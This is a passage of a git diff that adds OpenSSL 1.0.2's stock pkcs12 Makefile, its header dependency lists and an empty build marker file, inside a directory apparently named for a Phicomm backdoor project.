+p12_add.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_add.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_add.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_add.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_add.o: ../cryptlib.h p12_add.c
+p12_asn.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_asn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p12_asn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_asn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_asn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_asn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_asn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_asn.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_asn.c
+p12_attr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_attr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_attr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_attr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_attr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_attr.o: ../cryptlib.h p12_attr.c
+p12_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crpt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crpt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crpt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crpt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crpt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crpt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crpt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crpt.o: ../cryptlib.h p12_crpt.c
+p12_crt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crt.o: ../cryptlib.h p12_crt.c
+p12_decr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_decr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_decr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_decr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_decr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_decr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_decr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_decr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_decr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_decr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_decr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_decr.o: ../cryptlib.h p12_decr.c
+p12_init.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_init.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_init.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_init.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_init.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_init.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_init.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_init.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_init.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_init.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_init.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_init.o: ../cryptlib.h p12_init.c
+p12_key.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_key.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+p12_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_key.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_key.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_key.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_key.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_key.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_key.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_key.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_key.c
+p12_kiss.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_kiss.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_kiss.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_kiss.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_kiss.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_kiss.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_kiss.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_kiss.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_kiss.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_kiss.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_kiss.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_kiss.o: ../cryptlib.h p12_kiss.c
+p12_mutl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_mutl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_mutl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_mutl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_mutl.o: ../../include/openssl/hmac.h ../../include/openssl/lhash.h
+p12_mutl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_mutl.o: ../../include/openssl/opensslconf.h
+p12_mutl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_mutl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_mutl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+p12_mutl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_mutl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_mutl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_mutl.c
+p12_npas.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p12_npas.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_npas.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_npas.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_npas.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_npas.o: ../../include/openssl/opensslconf.h
+p12_npas.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_npas.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+p12_npas.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_npas.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_npas.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_npas.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_npas.o: p12_npas.c
+p12_p8d.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8d.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8d.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8d.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8d.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8d.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8d.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8d.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8d.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8d.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8d.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8d.o: ../cryptlib.h p12_p8d.c
+p12_p8e.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8e.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8e.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8e.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8e.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8e.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8e.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8e.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8e.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8e.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8e.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8e.o: ../cryptlib.h p12_p8e.c
+p12_utl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_utl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_utl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_utl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_utl.o: ../cryptlib.h p12_utl.c
+pk12err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pk12err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk12err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk12err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk12err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk12err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pk12err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+pk12err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk12err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk12err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk12err.o: ../../include/openssl/x509_vfy.h pk12err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.save
new file mode 100644
index 0000000..7309b1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.save
@@ -0,0 +1,263 @@
+#
+# OpenSSL/crypto/pkcs12/Makefile
+#
+
+DIR=	pkcs12
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= p12_add.c p12_asn.c p12_attr.c p12_crpt.c p12_crt.c p12_decr.c \
+	p12_init.c p12_key.c p12_kiss.c p12_mutl.c\
+	p12_utl.c p12_npas.c pk12err.c p12_p8d.c p12_p8e.c
+LIBOBJ= p12_add.o p12_asn.o p12_attr.o p12_crpt.o p12_crt.o p12_decr.o \
+	p12_init.o p12_key.o p12_kiss.o p12_mutl.o\
+	p12_utl.o p12_npas.o pk12err.o p12_p8d.o p12_p8e.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs12.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+p12_add.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_add.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_add.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_add.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_add.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_add.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_add.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_add.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_add.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_add.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_add.o: ../cryptlib.h p12_add.c
+p12_asn.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_asn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p12_asn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_asn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_asn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_asn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_asn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_asn.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_asn.c
+p12_attr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_attr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_attr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_attr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_attr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_attr.o: ../cryptlib.h p12_attr.c
+p12_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crpt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crpt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crpt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crpt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crpt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crpt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crpt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crpt.o: ../cryptlib.h p12_crpt.c
+p12_crt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crt.o: ../cryptlib.h p12_crt.c
+p12_decr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_decr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_decr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_decr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_decr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_decr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_decr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_decr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_decr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_decr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_decr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_decr.o: ../cryptlib.h p12_decr.c
+p12_init.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_init.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_init.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_init.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_init.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_init.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_init.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_init.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_init.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_init.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_init.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_init.o: ../cryptlib.h p12_init.c
+p12_key.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_key.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+p12_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_key.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_key.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_key.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_key.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_key.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_key.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_key.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_key.c
+p12_kiss.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_kiss.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_kiss.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_kiss.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_kiss.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_kiss.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_kiss.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_kiss.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_kiss.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_kiss.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_kiss.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_kiss.o: ../cryptlib.h p12_kiss.c
+p12_mutl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_mutl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_mutl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_mutl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_mutl.o: ../../include/openssl/hmac.h ../../include/openssl/lhash.h
+p12_mutl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_mutl.o: ../../include/openssl/opensslconf.h
+p12_mutl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_mutl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_mutl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+p12_mutl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_mutl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_mutl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_mutl.c
+p12_npas.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p12_npas.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_npas.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_npas.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_npas.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_npas.o: ../../include/openssl/opensslconf.h
+p12_npas.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_npas.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+p12_npas.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_npas.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_npas.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_npas.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_npas.o: p12_npas.c
+p12_p8d.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8d.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8d.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8d.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8d.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8d.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8d.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8d.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8d.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8d.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8d.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8d.o: ../cryptlib.h p12_p8d.c
+p12_p8e.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8e.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8e.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8e.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8e.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8e.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8e.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8e.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8e.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8e.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8e.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8e.o: ../cryptlib.h p12_p8e.c
+p12_utl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_utl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_utl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_utl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_utl.o: ../cryptlib.h p12_utl.c
+pk12err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pk12err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk12err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk12err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk12err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk12err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pk12err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+pk12err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk12err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk12err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk12err.o: ../../include/openssl/x509_vfy.h pk12err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/lib
new file mode 100644
index 0000000..e69de29
